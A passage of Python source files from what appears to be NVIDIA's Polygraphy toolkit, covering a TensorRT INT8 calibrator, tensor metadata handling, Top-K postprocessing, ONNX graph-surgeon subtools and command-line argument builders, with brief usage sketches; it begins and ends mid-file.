wavenet.add_argument('--wn-channels', default=512, type=int,
help='Number of channels in WN')
wavenet.add_argument('--wn-layers', default=8, type=int,
help='Number of layers in WN')
return parser
```
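A short sketch of how this parser is meant to be composed with a parent parser; the parent here is just a placeholder `argparse.ArgumentParser`.

```python
import argparse

parent = argparse.ArgumentParser(add_help=False)   # placeholder parent parser
parser = parse_waveglow_args(parent)
args = parser.parse_args(["--flows", "12", "--wn-channels", "512"])
print(args.flows, args.wn_channels)                # 12 512
```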
#### File: backend/trt/calibrator.py
```python
import contextlib
import os
from collections import OrderedDict
import tensorrt as trt
from polygraphy.logger.logger import G_LOGGER, LogMode
from polygraphy.util import misc
from polygraphy.util.cuda import DeviceBuffer
def Calibrator(data_loader, cache=None, BaseClass=trt.IInt8MinMaxCalibrator,
batch_size=None):
"""
Supplies calibration data to TensorRT to calibrate the network for INT8 inference.
Args:
data_loader (Generator -> OrderedDict[str, np.ndarray]):
A generator or iterable that yields a dictionary that maps input names to input NumPy buffers.
In case you don't know details about the inputs ahead of time, you can access the
`input_metadata` property in your data loader, which will be set to an `TensorMetadata` instance.
Note that this does not work for generators or lists.
The number of calibration batches is controlled by the number of items supplied
by the data loader.
cache (Union[str, file-like]):
Path or file-like object to save/load the calibration cache.
By default, the calibration cache is not saved.
BaseClass (type):
The type of calibrator to inherit from.
Defaults to trt.IInt8MinMaxCalibrator.
batch_size (int):
[DEPRECATED] The size of each batch provided by the data loader.
"""
class CalibratorClass(BaseClass):
"""
Calibrator that supplies calibration data to TensorRT to calibrate the network for INT8 inference.
"""
def __init__(self):
# Must explicitly initialize parent for any trampoline class! Will mysteriously segfault without this.
BaseClass.__init__(self)
self.data_loader = data_loader
self._cache = cache
self.device_buffers = OrderedDict()
self.reset()
G_LOGGER.verbose("Created calibrator [cache={:}]".format(self._cache))
self.batch_size = misc.default_value(batch_size, 1)
def reset(self, input_metadata=None):
"""
Reset this calibrator for reuse.
The calibrator will clear any dynamic ranges cached from previous calibration runs, and will
attempt to rewind the data loader (note that generators cannot be rewound).
Args:
input_metadata (TensorMetadata):
Mapping of input names to their data types and shapes.
Passed along to the data loader if provided. Generally should not be required
unless using Polygraphy's included `DataLoader` for this calibrator.
"""
if input_metadata is not None:
with contextlib.suppress(AttributeError):
self.data_loader.input_metadata = input_metadata
# Attempt to reset data loader
self.data_loader_iter = iter(self.data_loader)
self.num_batches = 0
# Make sure calibrator will check the cache again when reset.
self.cache_contents = None
self.has_cached_scales = False
def get_batch_size(self):
return self.batch_size
def get_batch(self, names):
try:
host_buffers = next(self.data_loader_iter)
except StopIteration:
if not self.num_batches:
G_LOGGER.warning("Calibrator data loader provided no data. Possibilities include: (1) data loader "
"has no data to provide, (2) data loader was a generator, and the calibrator is being "
"reused across multiple loaders (generators cannot be rewound)")
return None
else:
self.num_batches += 1
for name, host_buffer in host_buffers.items():
if name not in self.device_buffers:
self.device_buffers[name] = DeviceBuffer(shape=host_buffer.shape, dtype=host_buffer.dtype)
G_LOGGER.verbose("Allocated: {:}".format(self.device_buffers[name]))
if self.num_batches > 1:
G_LOGGER.warning("The calibrator data loader provided an extra input ({:}) compared to the last set of inputs.\n"
"Should this input be removed, or did you accidentally omit an input before?".format(name))
device_buffer = self.device_buffers[name]
device_buffer.copy_from(host_buffer)
return [device_buffer.address() for device_buffer in self.device_buffers.values()]
def read_calibration_cache(self):
def load_from_cache():
if self._cache is None:
return None
try:
if self._cache.seekable():
self._cache.seek(0)
return self._cache.read()
except AttributeError:
if os.path.exists(self._cache):
G_LOGGER.info("Reading calibration cache from: {:}".format(self._cache), mode=LogMode.ONCE)
with open(self._cache, "rb") as f:
return f.read()
except:
# Cache is not readable
return None
if not self.has_cached_scales:
self.cache_contents = load_from_cache()
if not self.cache_contents:
G_LOGGER.warning("Calibration cache was provided, but is empty. Will regenerate scales by running calibration.", mode=LogMode.ONCE)
self.cache_contents = None
else:
self.has_cached_scales = True
return self.cache_contents
def write_calibration_cache(self, cache):
self.cache_contents = cache.tobytes()
self.has_cached_scales = True
if self._cache is None:
return
try:
if self._cache.seekable():
self._cache.seek(0)
bytes_written = self._cache.write(self.cache_contents)
if bytes_written != len(self.cache_contents):
G_LOGGER.warning("Could not write entire cache. Note: cache contains {:} bytes, but only "
"{:} bytes were written".format(len(self.cache_contents), bytes_written))
except AttributeError:
G_LOGGER.info("Writing calibration cache to: {:}".format(self._cache))
with open(self._cache, "wb") as f:
f.write(self.cache_contents)
except:
# Cache is not writable
return
else:
self._cache.flush()
def free(self):
"""
Free the device buffers allocated for this calibrator.
"""
for device_buffer in self.device_buffers.values():
device_buffer.free()
return CalibratorClass()
```
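A minimal sketch of how the `Calibrator` above can be fed by a generator-style data loader; the input name, shape, and cache path are hypothetical.

```python
from collections import OrderedDict
import numpy as np

def calib_data(num_batches=4):
    # Each yielded item maps input names to host buffers (hypothetical name/shape).
    for _ in range(num_batches):
        yield OrderedDict([("input0", np.random.rand(1, 3, 224, 224).astype(np.float32))])

calibrator = Calibrator(calib_data(), cache="calibration.cache")
# The calibrator can then be attached to a TensorRT builder config for INT8 calibration.
```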
#### File: polygraphy/common/struct.py
```python
from collections import OrderedDict, namedtuple
import numpy as np
MetadataTuple = namedtuple("MetadataTuple", ["dtype", "shape"]) # Metadata for single tensor
class TensorMetadata(OrderedDict):
"""
An OrderedDict[str, Tuple[np.dtype, Tuple[int]]] that maps input names to their data types and shapes.
"""
def add(self, name, dtype, shape):
"""
Convenience function for adding entries.
Args:
name (str): The name of the input.
dtype (np.dtype): The data type of the input.
shape (Tuple[int]):
The shape of the input. Dynamic dimensions may
be indicated by negative values, ``None``, or a string.
Returns:
The newly added entry.
"""
self[name] = MetadataTuple(dtype, shape)
return self
def __repr__(self):
ret = "TensorMetadata()"
for name, (dtype, shape) in self.items():
ret += ".add('{:}', {:}, {:})".format(name, dtype, shape)
return ret
def __str__(self):
def str_from_single_meta(name, dtype, shape):
ret = "{:}".format(name)
meta_items = []
if dtype is not None:
meta_items.append("dtype={:}".format(np.dtype(dtype).name))
if shape is not None:
meta_items.append("shape={:}".format(tuple(shape)))
if meta_items:
ret += " [" + ", ".join(meta_items) + "]"
return ret
sep = ", "
elems = [str_from_single_meta(name, dtype, shape) for name, (dtype, shape) in self.items()]
return "{" + sep.join(elems) + "}"
```
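A short sketch showing how `TensorMetadata` is populated and rendered; the tensor names and shapes are illustrative.

```python
import numpy as np

meta = TensorMetadata().add("input0", np.float32, (1, 3, 224, 224)).add("mask", np.bool_, (1, 1))
print(meta)  # {input0 [dtype=float32, shape=(1, 3, 224, 224)], mask [dtype=bool, shape=(1, 1)]}
```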
#### File: polygraphy/comparator/postprocess.py
```python
import numpy as np
from polygraphy.util import misc
class PostprocessFunc(object):
"""
Provides functions that can apply post-processing to `IterationResult` s.
"""
@staticmethod
# This function returns a top_k function that can be used as a postprocess_func.
def topk_func(k=10, axis=-1, outputs=None, exclude=None):
"""
Creates a function that applies a Top-K operation to a IterationResult.
Top-K will return the indices of the k largest values in the array.
Args:
k (int):
The number of indices to keep.
If this exceeds the axis length, it will be clamped.
Defaults to 10.
axis (int):
The axis along which to apply the topk.
Defaults to -1.
outputs (Sequence[str]):
Names of outputs to apply top-k to.
Defaults to all outputs.
exclude (Sequence[str]):
Names of outputs to exclude. Top-K will not be applied to these outputs.
Returns:
Callable(IterationResult) -> IterationResult: The top-k function.
"""
exclude = set(misc.default_value(exclude, []))
# Top-K implementation.
def topk(run_result):
nonlocal outputs
outputs = set(misc.default_value(outputs, run_result.keys()))
for name, output in run_result.items():
if name in outputs and name not in exclude:
indices = np.argsort(-output, axis=axis)
axis_len = indices.shape[axis]
run_result[name] = np.take(indices, np.arange(0, min(k, axis_len)), axis=axis)
return run_result
return topk
```
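A quick sketch of the Top-K postprocess in action; a plain dict stands in for the `IterationResult` here, since the function only needs name-indexed NumPy arrays:

```python
import numpy as np
from polygraphy.comparator.postprocess import PostprocessFunc  # assumption: Polygraphy is installed

results = {"scores": np.array([[0.1, 0.7, 0.2],
                               [0.5, 0.3, 0.9]])}
top2 = PostprocessFunc.topk_func(k=2)

processed = top2(results)
print(processed["scores"])  # indices of the 2 largest values per row: [[1 2], [2 0]]
```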
#### File: tools/surgeon/surgeon.py
```python
import json
from collections import OrderedDict
import onnx
import onnx_graphsurgeon as gs
from polygraphy.common import TensorMetadata, constants
from polygraphy.logger import G_LOGGER
from polygraphy.tools.base import Tool
from polygraphy.tools.util import args as args_util
from polygraphy.tools.util import misc as tool_util
from polygraphy.util import misc
# Weights should be stored separately, JSON can just have a reference to a key.
class Config(OrderedDict):
@staticmethod
def from_graph(graph):
def names_from_tensors(tensors):
return [tensor.name for tensor in tensors]
def meta_from_tensors(tensors):
meta = []
for tensor in tensors:
tensor_meta = {"name": tensor.name}
if tensor.dtype:
tensor_meta["dtype"] = misc.STR_FROM_NP_TYPE[tensor.dtype]
if tensor.shape:
tensor_meta["shape"] = tensor.shape
meta.append(tensor_meta)
return meta
config = Config()
config["graph_inputs"] = meta_from_tensors(graph.inputs)
config["graph_outputs"] = meta_from_tensors(graph.outputs)
config["nodes"] = []
for node_id, node in enumerate(graph.nodes):
node_info = {
"id": node_id,
"name": node.name,
"op": node.op,
"inputs": names_from_tensors(node.inputs),
"outputs": names_from_tensors(node.outputs),
}
config["nodes"].append(node_info)
return config
################################# SUBTOOLS #################################
class STSurgeonBase(Tool):
def add_parser_args(self, parser, gs=False, inputs=False, shape_inference_default=None, data=False):
if gs:
parser.add_argument("--no-cleanup", help="Skip cleanup and keep unused nodes in the graph", action="store_true")
parser.add_argument("--no-toposort", help="Skip topologically sorting the graph", action="store_true")
args_util.add_model_args(parser, model_required=True, inputs=inputs)
args_util.add_onnx_args(parser, write=False, outputs=False, shape_inference_default=shape_inference_default)
args_util.add_tf_onnx_args(parser)
if data:
args_util.add_dataloader_args(parser)
def setup(self, args):
onnx_model = tool_util.get_onnx_model_loader(args)()
return gs.import_onnx(onnx_model)
class STExtract(STSurgeonBase):
"""
Extract a subgraph based on the specified inputs and outputs.
"""
def __init__(self):
self.name = "extract"
def add_parser_args(self, parser):
parser.add_argument("-o", "--output", required=True, help="Path at which to write the ONNX model including only the subgraph")
parser.add_argument("--inputs", dest="input_meta", help="Input metadata for subgraph (names, shapes, and data types). "
"Use 'auto' to make `extract` determine these automatically. Format: "
"--inputs <name>,<shape>,<dtype>. "
"For example: --inputs input0,1x3x224x224,float32 input1,auto,auto. "
"If omitted, uses the current model inputs. Supported data types are: {:}".format(list(misc.NP_TYPE_FROM_STR.keys())),
nargs="+", default=None)
parser.add_argument("--outputs", dest="output_meta", help="Output metadata for subgraph (names and data types). "
"Use 'auto' to make `extract` determine these automatically. Format: "
"--outputs <name>,<dtype>. "
"For example: --outputs output0:float32 output1:auto. "
"If omitted, uses the current model outputs. Supported data types are: {:}".format(list(misc.NP_TYPE_FROM_STR.keys())),
nargs="+", default=None)
super().add_parser_args(parser, gs=True, inputs="--model-inputs", shape_inference_default=True, data=True)
def __call__(self, args):
def missing_meta_tensors(input_metadata, output_metadata):
names = []
for name, (dtype, shape) in input_metadata.items():
if dtype is None or not shape:
names.append(name)
for name, (dtype, shape) in output_metadata.items():
if dtype is None:
names.append(name)
return names
def update_meta_from_tensor_map(meta, tensor_map):
for name, (dtype, shape) in meta.items():
tensor = tensor_map[name]
meta[name] = (dtype or tensor.dtype, shape or tensor.shape)
return meta
def meta_from_tensors(tensors):
meta = TensorMetadata()
for tensor in tensors:
meta.add(tensor.name, tensor.dtype, tensor.shape)
return meta
onnx_model = tool_util.get_onnx_model_loader(args)()
graph = gs.import_onnx(onnx_model)
tensor_map = graph.tensors()
if args.input_meta:
input_metadata = update_meta_from_tensor_map(args_util.parse_meta(args.input_meta), tensor_map)
else:
input_metadata = meta_from_tensors(graph.inputs)
if args.output_meta:
output_metadata = update_meta_from_tensor_map(args_util.parse_meta(args.output_meta, includes_shape=False), tensor_map)
else:
output_metadata = meta_from_tensors(graph.outputs)
missing_tensors = missing_meta_tensors(input_metadata, output_metadata)
if missing_tensors:
# Use ONNX runtime with static shapes to infer shapes when all else fails
# Returns a TensorMetadata for all tensors in the graph.
def fallback_shape_inference(onnx_model):
from polygraphy.backend.onnx import BytesFromOnnx, ModifyOnnx
from polygraphy.backend.onnxrt import (OnnxrtRunner,
SessionFromOnnxBytes)
load_model = ModifyOnnx(onnx_model, outputs=constants.MARK_ALL)
with OnnxrtRunner(SessionFromOnnxBytes(BytesFromOnnx(load_model))) as runner:
data_loader = tool_util.get_data_loader(args)
data_loader.input_metadata = runner.get_input_metadata()
outputs = runner.infer(feed_dict=data_loader[0])
meta = TensorMetadata()
for name, output in outputs.items():
meta.add(name, output.dtype, output.shape)
return meta
def update_meta_from_meta(meta, golden_meta):
for name, (dtype, shape) in meta.items():
if name in golden_meta:
(golden_dtype, golden_shape) = golden_meta[name]
meta[name] = (dtype or golden_dtype, shape or golden_shape)
G_LOGGER.verbose("Updated tensor: {:} metadata to: {:}".format(name, meta[name]))
return meta
G_LOGGER.warning("Some tensor shapes or dtypes are missing in the model. Note: Missing Tensors: {:}. "
"\nWill run inference to determine shapes. This will cause dynamic "
"dimensions to become static.\nTo avoid this, please provide metadata on the command-line. "
.format(missing_tensors))
golden_meta = fallback_shape_inference(onnx_model)
input_metadata = update_meta_from_meta(input_metadata, golden_meta)
output_metadata = update_meta_from_meta(output_metadata, golden_meta)
# Set the graph inputs and outputs
graph.inputs.clear()
for name, (dtype, shape) in input_metadata.items():
tensor = tensor_map[name]
tensor.dtype, tensor.shape = dtype, shape
tensor.inputs.clear()
graph.inputs.append(tensor)
graph.outputs.clear()
for name, (dtype, shape) in output_metadata.items():
tensor = tensor_map[name]
tensor.dtype, tensor.shape = dtype, shape
graph.outputs.append(tensor)
G_LOGGER.info("Using Graph Inputs:\n{:}{:}".format(constants.TAB, graph.inputs))
G_LOGGER.info("Using Graph Outputs:\n{:}{:}".format(constants.TAB, graph.outputs))
if not args.no_cleanup:
graph.cleanup()
if not args.no_toposort:
graph.toposort()
onnx_model = gs.export_onnx(graph)
G_LOGGER.info("Writing model to: {output}. To see more details about the model, use: polygraphy inspect model {output} --mode=basic".format(output=args.output))
onnx.save(onnx_model, args.output)
class STPrepare(STSurgeonBase):
"""
[EXPERIMENTAL] Prepare a JSON configuration file for a given model,
which can be edited and provided to `operate`.
"""
def __init__(self):
self.name = "prepare"
def add_parser_args(self, parser):
parser.add_argument("-o", "--output", help="Path to save JSON configuration for the model. "
"If omitted, the JSON configuration is printed to standard output.")
super().add_parser_args(parser)
def __call__(self, args):
graph = super().setup(args)
config = Config.from_graph(graph)
config_json = json.dumps(config, indent=constants.TAB)
G_LOGGER.info("Please do NOT modify the node 'id' values in the configuration file, or things may not work!")
if args.output:
with open(args.output, "w") as f:
f.write(config_json)
else:
print(config_json)
class STOperate(STSurgeonBase):
"""
[EXPERIMENTAL] Modify a model according to the provided JSON configuration file.
"""
def __init__(self):
self.name = "operate"
def add_parser_args(self, parser):
parser.add_argument("-c", "--config", required=True, help="Path to JSON configuration that specifies how the model should be modified.")
parser.add_argument("-o", "--output", required=True, help="Path to save the model")
super().add_parser_args(parser, gs=True)
def __call__(self, args):
graph = super().setup(args)
with open(args.config, "r") as f:
config = json.loads(f.read())
G_LOGGER.info("Please ensure you have not modified the node 'id' values in the configuration file, or things may not work!")
tensor_map = graph.tensors()
def get_tensor(name):
if name not in tensor_map:
G_LOGGER.verbose("Tensor: {:} does not exist in the model. Creating a new tensor".format(name))
tensor_map[name] = gs.Variable(name)
return tensor_map[name]
def tensors_from_names(names):
tensors = []
for name in names:
tensors.append(get_tensor(name))
return tensors
def tensors_from_meta(meta, shape_optional=False):
tensors = []
for tensor_meta in meta:
tensor = get_tensor(tensor_meta["name"])
if "shape" in tensor_meta:
tensor.shape = tensor_meta["shape"]
elif not shape_optional:
G_LOGGER.critical("Could not find shape information for tensor: {:}".format(tensor.name))
if "dtype" in tensor_meta:
tensor.dtype = misc.NP_TYPE_FROM_STR[tensor_meta["dtype"]]
tensors.append(tensor)
return tensors
graph.inputs = tensors_from_meta(config["graph_inputs"])
for inp in graph.inputs:
# Need to disconnect inputs of graph inputs, or nodes prior to them will remain
inp.inputs.clear()
graph.outputs = tensors_from_meta(config["graph_outputs"], shape_optional=True)
nodes = []
for node_info in config["nodes"]:
if node_info["id"] > len(graph.nodes):
G_LOGGER.critical("Could not find node with ID: {:}. Were the node IDs modified in the config file?".format(node_info["id"]))
node = graph.nodes[node_info["id"]]
node.name = node_info["name"]
node.op = node_info["op"]
node.inputs = tensors_from_names(node_info["inputs"])
node.outputs = tensors_from_names(node_info["outputs"])
nodes.append(node)
graph.nodes = nodes
if not args.no_cleanup:
graph.cleanup()
if not args.no_toposort:
graph.toposort()
onnx.save(gs.export_onnx(graph), args.output)
################################# MAIN TOOL #################################
class Surgeon(Tool):
"""
Modify models.
"""
def __init__(self):
self.name = "surgeon"
def add_parser_args(self, parser):
subparsers = parser.add_subparsers(title="Surgical Instruments", dest="instrument")
subparsers.required = True
SURGEON_SUBTOOLS = [
STExtract(),
STPrepare(),
STOperate(),
]
for subtool in SURGEON_SUBTOOLS:
subtool.setup_parser(subparsers)
def __call__(self, args):
pass
```
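For reference, a hypothetical example of the JSON structure that `prepare` writes and `operate` reads back, mirroring the keys produced by `Config.from_graph` above (tensor names, shapes, and the node are made up):

```python
import json

config = {
    "graph_inputs": [{"name": "x", "dtype": "float32", "shape": [1, 3, 224, 224]}],
    "graph_outputs": [{"name": "y", "dtype": "float32", "shape": [1, 3, 224, 224]}],
    "nodes": [
        # The 'id' values index into graph.nodes and must not be edited by hand.
        {"id": 0, "name": "identity_0", "op": "Identity", "inputs": ["x"], "outputs": ["y"]},
    ],
}
print(json.dumps(config, indent=4))
```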
#### File: tools/util/args.py
```python
import argparse
import copy
import os
from polygraphy.common import TensorMetadata, constants
from polygraphy.logger.logger import G_LOGGER, LogMode
from polygraphy.util import misc
# The functions in this file include flags to control the set of options that are generated.
def add_model_args(parser, model_required=False, inputs="--inputs"):
model_args = parser.add_argument_group("Model", "Model Options")
model_args.add_argument("model_file", help="Path to the model", nargs=None if model_required else '?')
model_args.add_argument("--model-type", help="The type of the input model: {{'frozen': TensorFlow frozen graph, 'keras': Keras model, "
"'ckpt': TensorFlow checkpoint directory, 'onnx': ONNX model, 'engine': TensorRT engine, 'uff': UFF file [deprecated], "
"'caffe': Caffe prototxt [deprecated]}}", choices=["frozen", "keras", "ckpt", "onnx", "uff", "caffe", "engine"],
default=None)
if inputs:
model_args.add_argument(inputs, inputs.replace("inputs", "input") + "-shapes", help="Model input(s) and their shape(s). Format: {arg_name} <name>,<shape>. "
"For example: {arg_name} image:1,1x3x224x224 other_input,10".format(arg_name=inputs), nargs="+", default=None, dest="inputs")
def add_dataloader_args(parser):
data_loader_args = parser.add_argument_group("Data Loader", "Options for modifying data used for inference")
data_loader_args.add_argument("--seed", metavar="SEED", help="Seed to use for random inputs",
type=int, default=None)
data_loader_args.add_argument("--int-min", help="Minimum integer value for random integer inputs", type=int, default=None)
data_loader_args.add_argument("--int-max", help="Maximum integer value for random integer inputs", type=int, default=None)
data_loader_args.add_argument("--float-min", help="Minimum float value for random float inputs", type=float, default=None)
data_loader_args.add_argument("--float-max", help="Maximum float value for random float inputs", type=float, default=None)
def add_comparator_args(parser, iters=True, accuracy=True, validate=True, read=True, write=True, fail_fast=True, subprocess=True, top_k=False):
comparator_args = parser.add_argument_group("Comparator", "Options for changing result comparison behavior")
if iters:
comparator_args.add_argument("--warm-up", metavar="NUM", help="Number of warm-up runs before timing inference", type=int, default=None)
comparator_args.add_argument("--iterations", metavar="NUM", help="Number of inference iterations", type=int, default=None)
if accuracy:
comparator_args.add_argument("--no-shape-check", help="Disable checking that output shapes match exactly", action="store_true", default=None)
comparator_args.add_argument("--rtol", metavar="RTOL", help="Relative tolerance for output comparison. See "
"https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html for details", type=float, default=None)
comparator_args.add_argument("--atol", metavar="ATOL", help="Absolute tolerance for output comparison. See "
"https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html for details", type=float, default=None)
if validate:
comparator_args.add_argument("--validate", help="Check outputs for NaNs", action="store_true", default=None)
if read:
comparator_args.add_argument("--load-results", help="Path(s) to load results from runners.", nargs="+", default=[])
if write:
comparator_args.add_argument("--save-results", help="Path to save results from runners.", default=None)
if fail_fast:
comparator_args.add_argument("--fail-fast", help="Fail fast (stop comparing after the first failure)", action="store_true", default=None)
if subprocess:
comparator_args.add_argument("--use-subprocess", help="Run runners in isolated subprocesses. Cannot be used with a debugger",
action="store_true", default=None)
if top_k:
comparator_args.add_argument("--top-k", help="[EXPERIMENTAL] Apply Top-K (i.e. find indices of K largest values) to the outputs before comparing them.", type=int, default=None)
return comparator_args
def add_runner_args(parser):
# Appends to args.runners
class StoreRunnerOrdered(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if not hasattr(namespace, "runners"):
namespace.runners = []
namespace.runners.append(option_string.lstrip("-").replace("-", "_"))
runner_args = parser.add_argument_group("Runners", "Options for selecting runners. Zero or more runners may be specified")
runner_args.add_argument("--trt", help="Run inference using TensorRT", action=StoreRunnerOrdered, nargs=0)
runner_args.add_argument("--trt-legacy", help="Run inference using Legacy TensorRT Runner. Only supports networks using implicit batch mode",
action=StoreRunnerOrdered, nargs=0)
runner_args.add_argument("--tf", help="Run inference using TensorFlow", action=StoreRunnerOrdered, nargs=0)
runner_args.add_argument("--onnxrt", help="Run inference using ONNX Runtime", action=StoreRunnerOrdered, nargs=0)
runner_args.add_argument("--onnxtf", help="Run inference using the ONNX-TensorFlow Backend", action=StoreRunnerOrdered, nargs=0)
runner_args.add_argument("--cntk", help="[EXPERIMENTAL] Run inference on a CNTK model using CNTK", action=StoreRunnerOrdered, nargs=0)
def add_trt_args(parser, write=True, config=True, outputs=True, network_api=False):
trt_args = parser.add_argument_group("TensorRT", "Options for TensorRT")
if write:
trt_args.add_argument("--save-engine", help="Path to save a TensorRT engine file", default=None)
if config:
trt_args.add_argument("--trt-min-shapes", action='append', help="The minimum shapes the optimization profile(s) will support. "
"Specify this option once for each profile. If not provided, inference-time input shapes are used. "
"Format: --trt-min-shapes <input0>,D0xD1x..xDN .. <inputN>,D0xD1x..xDN", nargs="+", default=[])
trt_args.add_argument("--trt-opt-shapes", action='append', help="The shapes for which the optimization profile(s) will be most performant. "
"Specify this option once for each profile. If not provided, inference-time input shapes are used. "
"Format: --trt-opt-shapes <input0>,D0xD1x..xDN .. <inputN>,D0xD1x..xDN", nargs="+", default=[])
trt_args.add_argument("--trt-max-shapes", action='append', help="The maximum shapes the optimization profile(s) will support. "
"Specify this option once for each profile. If not provided, inference-time input shapes are used. "
"Format: --trt-max-shapes <input0>,D0xD1x..xDN .. <inputN>,D0xD1x..xDN", nargs="+", default=[])
trt_args.add_argument("--tf32", help="Enable tf32 precision in TensorRT", action="store_true", default=None)
trt_args.add_argument("--fp16", help="Enable fp16 precision in TensorRT", action="store_true", default=None)
trt_args.add_argument("--int8", help="Enable int8 precision in TensorRT", action="store_true", default=None)
trt_args.add_argument("--strict-types", help="Enable strict types in TensorRT, forcing it to choose tactics based on the "
"layer precision set, even if another precision is faster.", action="store_true", default=None)
# Workspace uses float to enable scientific notation (e.g. 1e9)
trt_args.add_argument("--workspace", metavar="BYTES", help="Memory in bytes to allocate for the TensorRT builder's workspace", type=float, default=None)
trt_args.add_argument("--calibration-cache", help="Path to the calibration cache", default=None)
trt_args.add_argument("--plugins", help="Path(s) of additional plugin libraries to load", nargs="+", default=None)
trt_args.add_argument("--explicit-precision", help="Enable explicit precision mode", action="store_true", default=None)
trt_args.add_argument("--ext", help="Enable parsing ONNX models with externally stored weights", action="store_true", default=None)
if outputs:
trt_args.add_argument("--trt-outputs", help="Name(s) of TensorRT output(s). "
"Using '--trt-outputs mark all' indicates that all tensors should be used as outputs", nargs="+", default=None)
trt_args.add_argument("--trt-exclude-outputs", help="[EXPERIMENTAL] Name(s) of TensorRT output(s) to unmark as outputs. ",
nargs="+", default=None)
if network_api:
trt_args.add_argument("--network-api", help="[EXPERIMENTAL] Generated script will include placeholder code for defining a TensorRT Network using "
"the network API. Only valid if --gen/--gen-script is also enabled.", action="store_true", default=None)
def add_trt_legacy_args(parser):
trt_legacy_args = parser.add_argument_group("TensorRT Legacy", "[DEPRECATED] Options for TensorRT Legacy. Reuses TensorRT options, but does not support int8 mode or dynamic shapes")
trt_legacy_args.add_argument("-p", "--preprocessor", help="The preprocessor to use for the UFF converter", default=None)
trt_legacy_args.add_argument("--uff-order", help="The order of the input", default=None)
trt_legacy_args.add_argument("--batch-size", metavar="SIZE", help="The batch size to use in TensorRT when it cannot be automatically determined", type=int, default=None)
trt_legacy_args.add_argument("--model", help="Model file for Caffe models. The deploy file should be provided as the model_file positional argument", dest="caffe_model")
trt_legacy_args.add_argument("--save-uff", help="Save intermediate UFF files", action="store_true", default=None)
def add_tf_args(parser, tftrt=True, artifacts=True, runtime=True, outputs=True):
tf_args = parser.add_argument_group("TensorFlow", "Options for TensorFlow")
tf_args.add_argument("--ckpt", help="[EXPERIMENTAL] Name of the checkpoint to load. Required if the `checkpoint` file is missing. Should not include file extension "
"(e.g. to load `model.meta` use `--ckpt=model`)", default=None)
if outputs:
tf_args.add_argument("--tf-outputs", help="Name(s) of TensorFlow output(s). "
"Using '--tf-outputs mark all' indicates that all tensors should be used as outputs", nargs="+", default=None)
if artifacts:
tf_args.add_argument("--save-pb", help="Path to save the TensorFlow frozen graphdef", default=None)
tf_args.add_argument("--save-tensorboard", help="[EXPERIMENTAL] Path to save a TensorBoard visualization", default=None)
tf_args.add_argument("--save-timeline", help="[EXPERIMENTAL] Directory to save timeline JSON files for profiling inference (view at chrome://tracing)", default=None)
if runtime:
tf_args.add_argument("--gpu-memory-fraction", help="Maximum percentage of GPU memory TensorFlow can allocate per process", type=float, default=None)
tf_args.add_argument("--allow-growth", help="Allow GPU memory allocated by TensorFlow to grow", action="store_true", default=None)
tf_args.add_argument("--xla", help="[EXPERIMENTAL] Attempt to run graph with xla", action="store_true", default=None)
tf_args.add_argument("--freeze-graph", help="[EXPERIMENTAL] Attempt to freeze the graph", action="store_true", default=None)
if tftrt:
tftrt_args = parser.add_argument_group("TensorFlow-TensorRT", "[UNTESTED] Options for TensorFlow-TensorRT Integration")
tftrt_args.add_argument("--tftrt", help="[UNTESTED] Enable TF-TRT integration", action="store_true", default=None)
tftrt_args.add_argument("--minimum-segment-size", help="Minimum length of a segment to convert to TensorRT", type=int, default=None)
tftrt_args.add_argument("--dynamic-op", help="Enable dynamic mode (defers engine build until runtime)", action="store_true", default=None)
def add_onnx_args(parser, write=True, outputs=True, shape_inference_default=None):
onnx_args = parser.add_argument_group("ONNX Options", "Options for ONNX")
if write:
onnx_args.add_argument("--save-onnx", help="Path to save the ONNX model", default=None)
if shape_inference_default:
onnx_args.add_argument("--no-shape-inference", help="Disable ONNX shape inference when loading the model", action="store_true", default=None)
else:
onnx_args.add_argument("--shape-inference", help="Enable ONNX shape inference when loading the model", action="store_true", default=None)
if outputs:
onnx_args.add_argument("--onnx-outputs", help="Name(s) of ONNX output(s). "
"Using '--onnx-outputs mark all' indicates that all tensors should be used as outputs", nargs="+", default=None)
onnx_args.add_argument("--onnx-exclude-outputs", help="[EXPERIMENTAL] Name(s) of ONNX output(s) to unmark as outputs.", nargs="+", default=None)
def add_tf_onnx_args(parser):
tf_onnx_args = parser.add_argument_group("TensorFlow-ONNX Options", "Options for TensorFlow-ONNX conversion")
tf_onnx_args.add_argument("--opset", help="Opset to use when converting to ONNX", default=None, type=int)
tf_onnx_args.add_argument("--no-const-folding", help="Do not fold constants in the TensorFlow graph prior to conversion", action="store_true", default=None)
def add_logger_args(parser):
logging_args = parser.add_argument_group("Logging", "Options for logging and debug output")
logging_args.add_argument("-v", "--verbose", help="Increase logging verbosity. Specify multiple times for higher verbosity", action="count", default=0)
logging_args.add_argument("--silent", help="Disable all output", action="store_true", default=None)
logging_args.add_argument("--log-format", help="Format for log messages: {{'timestamp': Include timestamp, 'line-info': Include file and line number, "
"'no-colors': Disable colors}}", choices=["timestamp", "line-info", "no-colors"], nargs="+", default=[])
def get(args, attr):
"""
Gets a command-line argument if it exists, otherwise returns None.
Args:
args: The command-line arguments.
attr (str): The name of the command-line argument.
"""
if hasattr(args, attr):
return getattr(args, attr)
return None
def parse_meta(meta_args, includes_shape=True, includes_dtype=True):
"""
Parses a list of tensor metadata arguments of the form "<name>,<shape>,<dtype>".
`shape` and `dtype` are optional, but `dtype` must always come after `shape` if they are both enabled.
Args:
meta_args (List[str]): A list of tensor metadata arguments from the command-line.
includes_shape (bool): Whether the arguments include shape information.
includes_dtype (bool): Whether the arguments include dtype information.
Returns:
TensorMetadata: The parsed tensor metadata.
"""
SEP = ","
SHAPE_SEP = "x"
meta = TensorMetadata()
for orig_tensor_meta_arg in meta_args:
tensor_meta_arg = orig_tensor_meta_arg
def pop_meta(name):
nonlocal tensor_meta_arg
tensor_meta_arg, _, val = tensor_meta_arg.rpartition(SEP)
if not tensor_meta_arg:
G_LOGGER.critical("Could not parse {:} from argument: {:}. Is it separated by a comma "
"(,) from the tensor name?".format(name, orig_tensor_meta_arg))
if val.lower() == "auto":
val = None
return val
def parse_dtype(dtype):
if dtype is not None:
if dtype not in misc.NP_TYPE_FROM_STR:
G_LOGGER.critical("Could not understand data type: {:}. Please use one of: {:} or `auto`"
.format(dtype, list(misc.NP_TYPE_FROM_STR.keys())))
dtype = misc.NP_TYPE_FROM_STR[dtype]
return dtype
def parse_shape(shape):
if shape is not None:
def parse_shape_dim(buf):
try:
buf = int(buf)
except:
pass
return buf
parsed_shape = []
